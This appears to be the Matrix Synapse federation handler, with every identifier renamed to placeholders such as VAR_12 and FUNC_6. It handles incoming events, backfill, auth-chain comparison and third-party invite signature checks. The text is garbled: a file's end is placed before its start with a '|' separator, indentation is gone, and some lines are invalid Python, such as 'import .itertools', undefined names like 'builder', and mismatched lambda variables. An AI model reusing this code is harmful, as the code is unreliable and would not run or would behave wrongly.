VAR_135 = FUNC_51(VAR_131)
VAR_136 = FUNC_51(VAR_132)
continue
if VAR_135.depth < VAR_136.depth:
VAR_138.append(VAR_135)
VAR_135 = FUNC_51(VAR_131)
continue
if VAR_135.depth > VAR_136.depth:
VAR_137.append(VAR_136)
VAR_136 = FUNC_51(VAR_132)
continue
if VAR_135.event_id < VAR_136.event_id:
VAR_138.append(VAR_135)
VAR_135 = FUNC_51(VAR_131)
if VAR_135.event_id > VAR_136.event_id:
VAR_137.append(VAR_136)
VAR_136 = FUNC_51(VAR_132)
continue
VAR_0.debug("construct_auth_difference after while")
VAR_139 = [VAR_170.event_id for VAR_170 in VAR_137]
VAR_140 = list(VAR_137)
for VAR_170 in VAR_137:
for VAR_160 in VAR_170.auth_event_ids():
if VAR_160 in VAR_139:
try:
VAR_140.remove(VAR_170)
except ValueError:
pass
VAR_141 = {}
for VAR_170 in VAR_140:
VAR_180 = await self.store.get_rejection_reason(VAR_170.event_id)
if VAR_180 is None:
continue
VAR_141[VAR_170.event_id] = VAR_180
VAR_0.debug("construct_auth_difference returning")
return {
"auth_chain": VAR_40,
"rejects": {
VAR_170.event_id: {"reason": VAR_141[VAR_170.event_id], "proof": None}
for VAR_170 in VAR_140
},
"missing": [VAR_170.event_id for VAR_170 in VAR_138],
}
@log_function
async def FUNC_37(
self, VAR_42, VAR_43, VAR_11, VAR_44
):
VAR_142 = {"signed": VAR_44}
VAR_45 = {
"type": VAR_188.Member,
"content": {
"membership": Membership.INVITE,
"third_party_invite": VAR_142,
},
"room_id": VAR_11,
"sender": VAR_42,
"state_key": VAR_43,
}
if await self.auth.check_host_in_room(VAR_11, self.hs.hostname):
VAR_28 = await self.store.get_room_version_id(VAR_11)
VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
EventValidator().validate_builder(VAR_93)
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
VAR_1, VAR_32 = await self.add_display_name_to_third_party_invite(
VAR_28, VAR_45, VAR_1, VAR_32
)
EventValidator().validate_new(VAR_1, self.config)
VAR_1.internal_metadata.send_on_behalf_of = self.hs.hostname
try:
await self.auth.check_from_context(VAR_28, VAR_1, VAR_32)
except AuthError as VAR_170:
VAR_0.warning("Denying new third party invite %r because %s", VAR_1, VAR_170)
raise VAR_170
await self._check_signature(VAR_1, VAR_32)
VAR_143 = self.hs.get_room_member_handler()
await VAR_143.send_membership_event(None, VAR_1, VAR_32)
else:
VAR_181 = {VAR_204.split(":", 1)[-1] for VAR_204 in (VAR_42, VAR_11)}
await self.federation_client.forward_third_party_invite(
VAR_181, VAR_11, VAR_45
)
async def FUNC_38(
self, VAR_45: JsonDict
) -> None:
assert_params_in_dict(VAR_45, ["room_id"])
VAR_28 = await self.store.get_room_version_id(VAR_45["room_id"])
VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
VAR_1, VAR_32 = await self.add_display_name_to_third_party_invite(
VAR_28, VAR_45, VAR_1, VAR_32
)
try:
await self.auth.check_from_context(VAR_28, VAR_1, VAR_32)
except AuthError as VAR_170:
VAR_0.warning("Denying third party invite %r because %s", VAR_1, VAR_170)
raise VAR_170
await self._check_signature(VAR_1, VAR_32)
VAR_1.internal_metadata.send_on_behalf_of = get_domain_from_id(VAR_1.sender)
VAR_143 = self.hs.get_room_member_handler()
await VAR_143.send_membership_event(None, VAR_1, VAR_32)
async def FUNC_39(
self, VAR_28, VAR_45, VAR_1, VAR_32
):
VAR_144 = (
VAR_188.ThirdPartyInvite,
VAR_1.content["third_party_invite"]["signed"]["token"],
)
VAR_145 = None
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_146 = VAR_94.get(VAR_144)
if VAR_146:
VAR_145 = await self.store.get_event(
VAR_146, allow_none=True
)
if VAR_145:
VAR_182 = VAR_145.content.get("display_name")
VAR_45["content"]["third_party_invite"]["display_name"] = VAR_182
else:
VAR_0.info(
"Could not find invite VAR_1 for VAR_142: %r", VAR_45
)
VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
EventValidator().validate_builder(VAR_93)
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
EventValidator().validate_new(VAR_1, self.config)
return (VAR_1, VAR_32)
async def FUNC_40(self, VAR_1, VAR_32):
VAR_44 = VAR_1.content["third_party_invite"]["signed"]
VAR_147 = VAR_44["token"]
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_148 = VAR_94.get((VAR_188.ThirdPartyInvite, VAR_147))
VAR_149 = None
if VAR_148:
VAR_149 = await self.store.get_event(VAR_148, allow_none=True)
if not VAR_149:
raise AuthError(403, "Could not find invite")
VAR_0.debug("Checking VAR_89 on VAR_1 %r", VAR_1.content)
VAR_150 = None # type: Optional[Exception]
for public_key_object in self.hs.get_auth().get_public_keys(VAR_149):
try:
for server, signature_block in VAR_44["signatures"].items():
for VAR_199, encoded_signature in signature_block.items():
if not VAR_199.startswith("ed25519:"):
continue
VAR_0.debug(
"Attempting to verify sig with VAR_144 %s from %r "
"against pubkey %r",
VAR_199,
server,
public_key_object,
)
try:
VAR_46 = public_key_object["public_key"]
VAR_203 = decode_verify_key_bytes(
VAR_199, decode_base64(VAR_46)
)
verify_signed_json(VAR_44, server, VAR_203)
VAR_0.debug(
"Successfully verified sig with VAR_144 %s from %r "
"against pubkey %r",
VAR_199,
server,
public_key_object,
)
except Exception:
VAR_0.info(
"Failed to verify sig with VAR_144 %s from %r "
"against pubkey %r",
VAR_199,
server,
public_key_object,
)
raise
try:
if "key_validity_url" in public_key_object:
await self._check_key_revocation(
VAR_46, public_key_object["key_validity_url"]
)
except Exception:
VAR_0.info(
"Failed to query key_validity_url %s",
public_key_object["key_validity_url"],
)
raise
return
except Exception as VAR_170:
VAR_150 = VAR_170
if VAR_150 is None:
raise RuntimeError("no public VAR_144 in invite event")
raise VAR_150
async def FUNC_41(self, VAR_46, VAR_47):
try:
VAR_183 = await self.http_client.get_json(VAR_47, {"public_key": VAR_46})
except Exception:
raise SynapseError(502, "Third party certificate could not be checked")
if "valid" not in VAR_183 or not VAR_183["valid"]:
raise AuthError(403, "Third party certificate was invalid")
async def FUNC_42(
self,
VAR_11: str,
VAR_48: Sequence[Tuple[EventBase, EventContext]],
VAR_33: bool = False,
) -> int:
VAR_151 = self.config.worker.events_shard_config.get_instance(VAR_11)
if VAR_151 != self._instance_name:
VAR_184 = await self._send_events(
instance_name=VAR_151,
store=self.store,
VAR_11=room_id,
VAR_48=event_and_contexts,
VAR_33=backfilled,
)
return VAR_184["max_stream_id"]
else:
assert self.storage.persistence
VAR_20, VAR_49 = await self.storage.persistence.persist_events(
VAR_48, VAR_33=backfilled
)
if self._ephemeral_messages_enabled:
for VAR_1 in VAR_20:
self._message_handler.maybe_schedule_expiry(VAR_1)
if not VAR_33: # Never notify for VAR_33 VAR_20
for VAR_1 in VAR_20:
await self._notify_persisted_event(VAR_1, VAR_49)
return VAR_49.stream
async def FUNC_43(
self, VAR_1: EventBase, VAR_49: RoomStreamToken
) -> None:
VAR_152 = []
if VAR_1.type == VAR_188.Member:
VAR_43 = VAR_1.state_key
if VAR_1.internal_metadata.is_outlier():
if VAR_1.membership != Membership.INVITE:
if not self.is_mine_id(VAR_43):
return
VAR_185 = UserID.from_string(VAR_43)
VAR_152.append(VAR_185)
elif VAR_1.internal_metadata.is_outlier():
return
assert VAR_1.internal_metadata.stream_ordering
VAR_153 = PersistedEventPosition(
self._instance_name, VAR_1.internal_metadata.stream_ordering
)
self.notifier.on_new_room_event(
VAR_1, VAR_153, VAR_49, VAR_152=extra_users
)
async def FUNC_44(self, VAR_11: str) -> None:
if self.config.worker_app:
await self._clean_room_for_join_client(VAR_11)
else:
await self.store.clean_room_for_join(VAR_11)
async def FUNC_45(
self, VAR_50: List[str], VAR_11: str
) -> Optional[dict]:
for host in VAR_50:
VAR_168 = await self.federation_client.get_room_complexity(host, VAR_11)
if VAR_168:
return VAR_168
return None
|
import .itertools
import logging
from collections.abc import Container
from http import HTTPStatus
from typing import TYPE_CHECKING, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import attr
from signedjson.key import decode_verify_key_bytes
from signedjson.sign import verify_signed_json
from unpaddedbase64 import decode_base64
from twisted.internet import defer
from synapse import .event_auth
from synapse.api.constants import (
VAR_188,
Membership,
RejectedReason,
RoomEncryptionAlgorithms,
)
from synapse.api.errors import (
AuthError,
CodeMessageException,
Codes,
FederationDeniedError,
FederationError,
HttpResponseException,
NotFoundError,
RequestSendFailed,
SynapseError,
)
from synapse.api.room_versions import KNOWN_ROOM_VERSIONS, RoomVersion, RoomVersions
from synapse.crypto.event_signing import .compute_event_signature
from synapse.event_auth import .auth_types_for_event
from synapse.events import EventBase
from synapse.events.snapshot import EventContext
from synapse.events.validator import EventValidator
from synapse.handlers._base import BaseHandler
from synapse.http.servlet import assert_params_in_dict
from synapse.logging.context import (
make_deferred_yieldable,
nested_logging_context,
preserve_fn,
run_in_background,
)
from synapse.logging.utils import log_function
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.http.devices import ReplicationUserDevicesResyncRestServlet
from synapse.replication.http.federation import (
ReplicationCleanRoomRestServlet,
ReplicationFederationSendEventsRestServlet,
ReplicationStoreRoomOnOutlierMembershipRestServlet,
)
from synapse.state import StateResolutionStore
from synapse.storage.databases.main.events_worker import EventRedactBehaviour
from synapse.types import (
JsonDict,
MutableStateMap,
PersistedEventPosition,
RoomStreamToken,
StateMap,
UserID,
get_domain_from_id,
)
from synapse.util.async_helpers import Linearizer, concurrently_execute
from synapse.util.retryutils import NotRetryingDestination
from synapse.util.stringutils import shortstr
from synapse.visibility import filter_events_for_server
if TYPE_CHECKING:
from synapse.server import HomeServer
VAR_0 = logging.getLogger(__name__)
@attr.s(slots=True)
class CLASS_0:
VAR_1 = attr.ib(type=EventBase)
VAR_2 = attr.ib(type=Optional[Sequence[EventBase]], default=None)
VAR_3 = attr.ib(type=Optional[MutableStateMap[EventBase]], default=None)
class CLASS_1(BaseHandler):
def __init__(self, VAR_4: "HomeServer"):
super().__init__(VAR_4)
self.hs = VAR_4
self.store = VAR_4.get_datastore()
self.storage = VAR_4.get_storage()
self.state_store = self.storage.state
self.federation_client = VAR_4.get_federation_client()
self.state_handler = VAR_4.get_state_handler()
self._state_resolution_handler = VAR_4.get_state_resolution_handler()
self.server_name = VAR_4.hostname
self.keyring = VAR_4.get_keyring()
self.action_generator = VAR_4.get_action_generator()
self.is_mine_id = VAR_4.is_mine_id
self.spam_checker = VAR_4.get_spam_checker()
self.event_creation_handler = VAR_4.get_event_creation_handler()
self._message_handler = VAR_4.get_message_handler()
self._server_notices_mxid = VAR_4.config.server_notices_mxid
self.config = VAR_4.config
self.http_client = VAR_4.get_proxied_blacklisted_http_client()
self._instance_name = VAR_4.get_instance_name()
self._replication = VAR_4.get_replication_data_handler()
self._send_events = ReplicationFederationSendEventsRestServlet.make_client(VAR_4)
self._clean_room_for_join_client = ReplicationCleanRoomRestServlet.make_client(
VAR_4
)
if VAR_4.config.worker_app:
self._user_device_resync = ReplicationUserDevicesResyncRestServlet.make_client(
VAR_4
)
self._maybe_store_room_on_outlier_membership = ReplicationStoreRoomOnOutlierMembershipRestServlet.make_client(
VAR_4
)
else:
self._device_list_updater = VAR_4.get_device_handler().device_list_updater
self._maybe_store_room_on_outlier_membership = (
self.store.maybe_store_room_on_outlier_membership
)
self.room_queues = {} # type: Dict[str, List[Tuple[EventBase, str]]]
self._room_pdu_linearizer = Linearizer("fed_room_pdu")
self.third_party_event_rules = VAR_4.get_third_party_event_rules()
self._ephemeral_messages_enabled = VAR_4.config.enable_ephemeral_messages
async def FUNC_0(self, VAR_5, VAR_6, VAR_7=False) -> None:
VAR_11 = VAR_6.room_id
VAR_12 = VAR_6.event_id
VAR_0.info("handling received PDU: %s", VAR_6)
VAR_51 = await self.store.get_event(
VAR_12, allow_none=True, allow_rejected=True
)
VAR_52 = VAR_51 and (
not VAR_51.internal_metadata.is_outlier()
or VAR_6.internal_metadata.is_outlier()
)
if VAR_52:
VAR_0.debug("[%s %s]: Already VAR_54 pdu", VAR_11, VAR_12)
return
try:
self._sanity_check_event(VAR_6)
except SynapseError as err:
VAR_0.warning(
"[%s %s] Received VAR_1 failed sanity checks", VAR_11, VAR_12
)
raise FederationError("ERROR", err.code, err.msg, affected=VAR_6.event_id)
if VAR_11 in self.room_queues:
VAR_0.info(
"[%s %s] Queuing PDU from %s for now: join in progress",
VAR_11,
VAR_12,
VAR_5,
)
self.room_queues[VAR_11].append((VAR_6, VAR_5))
return
VAR_53 = await self.auth.check_host_in_room(VAR_11, self.server_name)
if not VAR_53:
VAR_0.info(
"[%s %s] Ignoring PDU from %s as we're not in the room",
VAR_11,
VAR_12,
VAR_5,
)
return None
VAR_2 = None
if not VAR_6.internal_metadata.is_outlier():
VAR_9 = await self.get_min_depth_for_context(VAR_6.room_id)
VAR_0.debug("[%s %s] VAR_9: %d", VAR_11, VAR_12, VAR_9)
VAR_8 = set(VAR_6.prev_event_ids())
VAR_54 = await self.store.have_events_in_timeline(VAR_8)
if VAR_9 is not None and VAR_6.depth < VAR_9:
VAR_6.internal_metadata.outlier = True
elif VAR_9 is not None and VAR_6.depth > VAR_9:
VAR_191 = VAR_8 - VAR_54
if VAR_7 and VAR_191:
VAR_0.info(
"[%s %s] Acquiring room lock to fetch %d VAR_37 prev_events: %s",
VAR_11,
VAR_12,
len(VAR_191),
shortstr(VAR_191),
)
with (await self._room_pdu_linearizer.queue(VAR_6.room_id)):
VAR_0.info(
"[%s %s] Acquired room lock to fetch %d VAR_37 prev_events",
VAR_11,
VAR_12,
len(VAR_191),
)
try:
await self._get_missing_events_for_pdu(
VAR_5, VAR_6, VAR_8, VAR_9
)
except Exception as VAR_170:
raise Exception(
"Error fetching VAR_37 prev_events for %s: %s"
% (VAR_12, VAR_170)
) from VAR_170
VAR_54 = await self.store.have_events_in_timeline(VAR_8)
if not VAR_8 - VAR_54:
VAR_0.info(
"[%s %s] Found all VAR_37 prev_events",
VAR_11,
VAR_12,
)
if VAR_8 - VAR_54:
if VAR_7:
VAR_0.warning(
"[%s %s] Rejecting: failed to fetch %d prev VAR_20: %s",
VAR_11,
VAR_12,
len(VAR_8 - VAR_54),
shortstr(VAR_8 - VAR_54),
)
raise FederationError(
"ERROR",
403,
(
"Your server isn't divulging details about prev_events "
"referenced in this VAR_1."
),
affected=VAR_6.event_id,
)
VAR_0.info(
"Event %s is VAR_37 prev_events: calculating VAR_2 for a "
"backwards extremity",
VAR_12,
)
VAR_60 = {VAR_12: VAR_6}
try:
VAR_192 = await self.state_store.get_state_groups_ids(VAR_11, VAR_54)
VAR_193 = list(VAR_192.values()) # type: List[StateMap[str]]
del VAR_192
for p in VAR_8 - VAR_54:
VAR_0.info(
"Requesting VAR_2 at VAR_37 VAR_200 %s", VAR_12,
)
with nested_logging_context(p):
(VAR_62, VAR_166,) = await self._get_state_for_room(
VAR_5, VAR_11, p, VAR_13=True
)
VAR_202 = {
(VAR_204.type, VAR_204.state_key): VAR_204.event_id for VAR_204 in VAR_62
}
VAR_193.append(VAR_202)
for VAR_204 in VAR_62:
VAR_60[VAR_204.event_id] = VAR_204
VAR_28 = await self.store.get_room_version_id(VAR_11)
VAR_87 = await self._state_resolution_handler.resolve_events_with_store(
VAR_11,
VAR_28,
VAR_193,
VAR_60,
state_res_store=StateResolutionStore(self.store),
)
VAR_194 = await self.store.get_events(
list(VAR_87.values()),
get_prev_content=False,
redact_behaviour=EventRedactBehaviour.AS_IS,
)
VAR_60.update(VAR_194)
VAR_2 = [VAR_60[VAR_170] for VAR_170 in VAR_87.values()]
except Exception:
VAR_0.warning(
"[%s %s] Error attempting to VAR_85 VAR_2 at VAR_37 "
"prev_events",
VAR_11,
VAR_12,
exc_info=True,
)
raise FederationError(
"ERROR",
403,
"We can't get valid VAR_2 history.",
affected=VAR_12,
)
await self._process_received_pdu(VAR_5, VAR_6, VAR_2=state)
async def FUNC_1(self, VAR_5, VAR_6, VAR_8, VAR_9):
VAR_11 = VAR_6.room_id
VAR_12 = VAR_6.event_id
VAR_54 = await self.store.have_events_in_timeline(VAR_8)
if not VAR_8 - VAR_54:
return
VAR_55 = await self.store.get_latest_event_ids_in_room(VAR_11)
VAR_56 = set(VAR_55)
VAR_56 |= VAR_54
VAR_0.info(
"[%s %s]: Requesting VAR_37 VAR_20 between %s and %s",
VAR_11,
VAR_12,
shortstr(VAR_56),
VAR_12,
)
try:
VAR_65 = await self.federation_client.get_missing_events(
VAR_5,
VAR_11,
earliest_events_ids=list(VAR_56),
VAR_39=[VAR_6],
VAR_17=10,
VAR_9=min_depth,
timeout=60000,
)
except (RequestSendFailed, HttpResponseException, NotRetryingDestination) as VAR_170:
VAR_0.warning(
"[%s %s]: Failed to get prev_events: %s", VAR_11, VAR_12, VAR_170
)
return
VAR_0.info(
"[%s %s]: Got %d prev_events: %s",
VAR_11,
VAR_12,
len(VAR_65),
shortstr(VAR_65),
)
VAR_65.sort(VAR_144=lambda VAR_204: x.depth)
for VAR_21 in VAR_65:
VAR_0.info(
"[%s %s] Handling received VAR_200 %s",
VAR_11,
VAR_12,
VAR_21.event_id,
)
with nested_logging_context(VAR_21.event_id):
try:
await self.on_receive_pdu(VAR_5, VAR_21, VAR_7=False)
except FederationError as VAR_170:
if VAR_170.code == 403:
VAR_0.warning(
"[%s %s] Received VAR_200 %s failed history check.",
VAR_11,
VAR_12,
VAR_21.event_id,
)
else:
raise
async def FUNC_2(
self,
VAR_10: str,
VAR_11: str,
VAR_12: str,
VAR_13: bool = False,
) -> Tuple[List[EventBase], List[EventBase]]:
(
VAR_57,
VAR_58,
) = await self.federation_client.get_room_state_ids(
VAR_10, VAR_11, VAR_12=event_id
)
VAR_59 = set(VAR_57 + VAR_58)
if VAR_13:
VAR_59.add(VAR_12)
VAR_60 = await self._get_events_from_store_or_dest(
VAR_10, VAR_11, VAR_59
)
VAR_61 = VAR_59 - VAR_60.keys()
if VAR_61:
VAR_0.warning(
"Failed to fetch VAR_37 VAR_2/VAR_89 VAR_20 for %s %s",
VAR_12,
VAR_61,
)
VAR_62 = [
VAR_60[VAR_160] for VAR_160 in VAR_57 if VAR_160 in VAR_60
]
if VAR_13:
VAR_154 = VAR_60.get(VAR_12)
if not VAR_154:
raise Exception("Unable to get VAR_37 VAR_200 %s" % (VAR_12,))
if VAR_154.is_state() and VAR_154.rejected_reason is None:
VAR_62.append(VAR_154)
VAR_63 = [VAR_60[VAR_160] for VAR_160 in VAR_58 if VAR_160 in VAR_60]
VAR_63.sort(VAR_144=lambda VAR_170: VAR_170.depth)
return VAR_62, VAR_63
async def FUNC_3(
self, VAR_10: str, VAR_11: str, VAR_14: Iterable[str]
) -> Dict[str, EventBase]:
VAR_64 = await self.store.get_events(VAR_14, allow_rejected=True)
VAR_65 = set(VAR_14) - VAR_64.keys()
if VAR_65:
VAR_0.debug(
"Fetching unknown VAR_2/VAR_89 VAR_20 %s for room %s",
VAR_65,
VAR_11,
)
await self._get_events_and_persist(
VAR_10=destination, VAR_11=room_id, VAR_20=VAR_65
)
VAR_64.update(
(await self.store.get_events(VAR_65, allow_rejected=True))
)
VAR_66 = [
(VAR_12, VAR_1.room_id)
for VAR_12, VAR_1 in VAR_64.items()
if VAR_1.room_id != VAR_11
]
for bad_event_id, bad_room_id in VAR_66:
VAR_0.warning(
"Remote server %s claims VAR_1 %s in room %s is an VAR_89/VAR_2 "
"event in room %s",
VAR_10,
bad_event_id,
bad_room_id,
VAR_11,
)
del VAR_64[bad_event_id]
return VAR_64
async def FUNC_4(
self, VAR_5: str, VAR_1: EventBase, VAR_2: Optional[Iterable[EventBase]],
):
VAR_11 = VAR_1.room_id
VAR_12 = VAR_1.event_id
VAR_0.debug("[%s %s] Processing VAR_1: %s", VAR_11, VAR_12, VAR_1)
try:
await self._handle_new_event(VAR_5, VAR_1, VAR_2=state)
except AuthError as VAR_170:
raise FederationError("ERROR", VAR_170.code, VAR_170.msg, affected=VAR_1.event_id)
if VAR_1.type == VAR_188.Encrypted:
VAR_155 = VAR_1.content.get("device_id")
VAR_156 = VAR_1.content.get("sender_key")
VAR_157 = await self.store.get_cached_devices_for_user(VAR_1.sender)
VAR_158 = False # Whether we should VAR_158 VAR_159 lists.
VAR_159 = None
if VAR_155 is not None:
VAR_159 = VAR_157.get(VAR_155)
if VAR_159 is None:
VAR_0.info(
"Received VAR_1 from remote VAR_159 not in our cache: %s %s",
VAR_1.sender,
VAR_155,
)
VAR_158 = True
if VAR_156 is not None:
VAR_186 = [] # type: Container[str]
if VAR_159:
VAR_195 = VAR_159.get("keys", {}).get("keys", {})
if (
VAR_1.content.get("algorithm")
== RoomEncryptionAlgorithms.MEGOLM_V1_AES_SHA2
):
VAR_199 = "curve25519:%s" % (VAR_155,)
VAR_186 = [VAR_195.get(VAR_199)]
else:
VAR_186 = VAR_195.values()
elif VAR_155:
pass
else:
VAR_186 = [
VAR_144
for VAR_159 in VAR_157.values()
for VAR_144 in VAR_159.get("keys", {}).get("keys", {}).values()
]
if VAR_156 not in VAR_186:
VAR_0.info(
"Received VAR_1 from remote VAR_159 with unexpected VAR_15 VAR_144: %s %s: %s",
VAR_1.sender,
VAR_155 or "<no VAR_155>",
VAR_156,
)
VAR_158 = True
if VAR_158:
run_as_background_process(
"resync_device_due_to_pdu", self._resync_device, VAR_1.sender
)
async def FUNC_5(self, VAR_15: str) -> None:
try:
await self.store.mark_remote_user_device_cache_as_stale(VAR_15)
if self.config.worker_app:
await self._user_device_resync(VAR_27=VAR_15)
else:
await self._device_list_updater.user_device_resync(VAR_15)
except Exception:
VAR_0.exception("Failed to VAR_158 VAR_159 for %s", VAR_15)
@log_function
async def FUNC_6(self, VAR_16, VAR_11, VAR_17, VAR_18):
if VAR_16 == self.server_name:
raise SynapseError(400, "Can't FUNC_6 from self.")
VAR_20 = await self.federation_client.backfill(
VAR_16, VAR_11, VAR_17=limit, VAR_18=extremities
)
if not VAR_20:
return []
VAR_67 = await self.store.have_events_in_timeline(
{VAR_170.event_id for VAR_170 in VAR_20}
)
VAR_20 = [VAR_170 for VAR_170 in VAR_20 if VAR_170.event_id not in VAR_67]
if not VAR_20:
return []
VAR_60 = {VAR_170.event_id: VAR_170 for VAR_170 in VAR_20}
VAR_14 = {VAR_170.event_id for VAR_170 in VAR_20}
VAR_68 = [VAR_21.event_id for VAR_21 in VAR_20 if set(VAR_21.prev_event_ids()) - VAR_14]
VAR_0.info("backfill: Got %d VAR_20 with %d edges", len(VAR_20), len(VAR_68))
VAR_3 = {}
VAR_69 = {}
VAR_70 = {}
for VAR_160 in VAR_68:
VAR_2, VAR_89 = await self._get_state_for_room(
VAR_10=VAR_16,
VAR_11=room_id,
VAR_12=VAR_160,
VAR_13=False,
)
VAR_3.update({a.event_id: a for a in VAR_89})
VAR_3.update({s.event_id: s for s in VAR_2})
VAR_69.update({s.event_id: s for s in VAR_2})
VAR_70[VAR_160] = VAR_2
VAR_71 = {
a_id
for VAR_1 in VAR_20
+ list(VAR_69.values())
+ list(VAR_3.values())
for a_id in VAR_1.auth_event_ids()
}
VAR_3.update(
{VAR_160: VAR_60[VAR_160] for VAR_160 in VAR_71 if VAR_160 in VAR_60}
)
VAR_72 = []
for VAR_160 in VAR_70:
VAR_21 = VAR_60[VAR_160]
assert not VAR_21.internal_metadata.is_outlier()
VAR_72.append(
CLASS_0(
VAR_1=VAR_21,
VAR_2=VAR_70[VAR_160],
VAR_3={
(
auth_events[a_id].type,
VAR_3[a_id].state_key,
): VAR_3[a_id]
for a_id in VAR_21.auth_event_ids()
if a_id in VAR_3
},
)
)
if VAR_72:
await self._handle_new_events(VAR_16, VAR_11, VAR_72, VAR_33=True)
VAR_20.sort(VAR_144=lambda VAR_170: VAR_170.depth)
for VAR_1 in VAR_20:
if VAR_1 in VAR_70:
continue
assert not VAR_1.internal_metadata.is_outlier()
await self._handle_new_event(VAR_16, VAR_1, VAR_33=True)
return VAR_20
async def FUNC_7(
self, VAR_11: str, VAR_19: int, VAR_17: int
) -> bool:
VAR_18 = await self.store.get_oldest_events_with_depth_in_room(VAR_11)
if not VAR_18:
VAR_0.debug("Not backfilling as no extremeties found.")
return False
VAR_73 = await self.store.get_successor_events(list(VAR_18))
VAR_74 = await self.store.get_events(
VAR_73,
redact_behaviour=EventRedactBehaviour.AS_IS,
get_prev_content=False,
)
VAR_75 = await filter_events_for_server(
self.storage,
self.server_name,
list(VAR_74.values()),
redact=False,
check_history_visibility_only=True,
)
if not VAR_75:
return False
VAR_76 = sorted(VAR_18.items(), VAR_144=lambda VAR_170: -int(VAR_170[1]))
VAR_77 = VAR_76[0][1]
if VAR_19 - 2 * VAR_17 > VAR_77:
VAR_0.debug(
"Not backfilling as we don't need to. %d < %d - 2 * %d",
VAR_77,
VAR_19,
VAR_17,
)
return False
VAR_0.debug(
"room_id: %s, FUNC_6: VAR_19: %s, VAR_77: %s, extrems: %s",
VAR_11,
VAR_19,
VAR_77,
VAR_76,
)
VAR_78 = [
t for t in VAR_76 if int(t[1]) <= VAR_19
]
if VAR_78:
VAR_76 = VAR_78
VAR_18 = dict(VAR_76[:5])
VAR_79 = await self.state_handler.get_current_state(VAR_11)
def FUNC_46(VAR_2):
VAR_161 = [
(state_key, int(VAR_1.depth))
for (e_type, state_key), VAR_1 in VAR_2.items()
if e_type == VAR_188.Member and VAR_1.membership == Membership.JOIN
]
VAR_162 = {} # type: Dict[str, int]
for u, d in VAR_161:
try:
VAR_196 = get_domain_from_id(u)
VAR_197 = VAR_162.get(VAR_196)
if VAR_197:
VAR_162[VAR_196] = min(d, VAR_197)
else:
VAR_162[VAR_196] = d
except Exception:
pass
return sorted(VAR_162.items(), VAR_144=lambda d: d[1])
VAR_80 = FUNC_46(VAR_79)
VAR_81 = [
domain for domain, depth in VAR_80 if domain != self.server_name
]
async def FUNC_47(VAR_82):
for VAR_196 in VAR_82:
try:
await self.backfill(
VAR_196, VAR_11, VAR_17=100, VAR_18=extremities
)
return True
except SynapseError as VAR_170:
VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except HttpResponseException as VAR_170:
if 400 <= VAR_170.code < 500:
raise VAR_170.to_synapse_error()
VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except CodeMessageException as VAR_170:
if 400 <= VAR_170.code < 500:
raise
VAR_0.info("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except NotRetryingDestination as VAR_170:
VAR_0.info(str(VAR_170))
continue
except RequestSendFailed as VAR_170:
VAR_0.info("Failed to get FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
except FederationDeniedError as VAR_170:
VAR_0.info(VAR_170)
continue
except Exception as VAR_170:
VAR_0.exception("Failed to FUNC_6 from %s because %s", VAR_196, VAR_170)
continue
return False
VAR_83 = await FUNC_47(VAR_81)
if VAR_83:
return True
VAR_84 = set(VAR_81)
VAR_84.add(self.server_name)
VAR_14 = list(VAR_18.keys())
VAR_0.debug("calling resolve_state_groups in _maybe_backfill")
VAR_85 = preserve_fn(self.state_handler.resolve_state_groups_for_events)
VAR_86 = await make_deferred_yieldable(
defer.gatherResults(
[VAR_85(VAR_11, [VAR_170]) for VAR_170 in VAR_14], consumeErrors=True
)
)
VAR_86 = dict(zip(VAR_14, [s.state for s in VAR_86]))
VAR_87 = await self.store.get_events(
[VAR_160 for ids in VAR_86.values() for VAR_160 in ids.values()],
get_prev_content=False,
)
VAR_86 = {
VAR_144: {
k: VAR_87[VAR_160]
for k, VAR_160 in state_dict.items()
if VAR_160 in VAR_87
}
for VAR_144, state_dict in VAR_86.items()
}
for VAR_160, VAR_166 in VAR_76:
VAR_81 = FUNC_46(VAR_86[VAR_160])
VAR_83 = await FUNC_47(
[VAR_196 for VAR_196, VAR_166 in VAR_81 if VAR_196 not in VAR_84]
)
if VAR_83:
return True
VAR_84.update(VAR_196 for VAR_196, VAR_166 in VAR_81)
return False
async def FUNC_8(
self, VAR_10: str, VAR_11: str, VAR_20: Iterable[str]
):
VAR_28 = await self.store.get_room_version(VAR_11)
VAR_60 = {} # type: Dict[str, EventBase]
async def FUNC_48(VAR_12: str):
with nested_logging_context(VAR_12):
try:
VAR_1 = await self.federation_client.get_pdu(
[VAR_10], VAR_12, VAR_28, outlier=True,
)
if VAR_1 is None:
VAR_0.warning(
"Server %s didn't return VAR_1 %s", VAR_10, VAR_12,
)
return
VAR_60[VAR_1.event_id] = VAR_1
except Exception as VAR_170:
VAR_0.warning(
"Error fetching VAR_37 VAR_2/VAR_89 VAR_1 %s: %s %s",
VAR_12,
type(VAR_170),
e,
)
await concurrently_execute(FUNC_48, VAR_20, 5)
VAR_3 = [
aid
for VAR_1 in VAR_60.values()
for aid in VAR_1.auth_event_ids()
if aid not in VAR_60
]
VAR_88 = await self.store.get_events(
VAR_3, allow_rejected=True,
)
VAR_34 = []
for VAR_1 in VAR_60.values():
VAR_89 = {}
for auth_event_id in VAR_1.auth_event_ids():
VAR_187 = VAR_88.get(auth_event_id) or VAR_60.get(auth_event_id)
if VAR_187:
VAR_89[(VAR_187.type, VAR_187.state_key)] = VAR_187
else:
VAR_0.info("Missing VAR_89 VAR_1 %s", auth_event_id)
VAR_34.append(CLASS_0(VAR_1, None, VAR_89))
await self._handle_new_events(
VAR_10, VAR_11, VAR_34,
)
def FUNC_9(self, VAR_21):
if len(VAR_21.prev_event_ids()) > 20:
VAR_0.warning(
"Rejecting VAR_1 %s which has %i prev_events",
VAR_21.event_id,
len(VAR_21.prev_event_ids()),
)
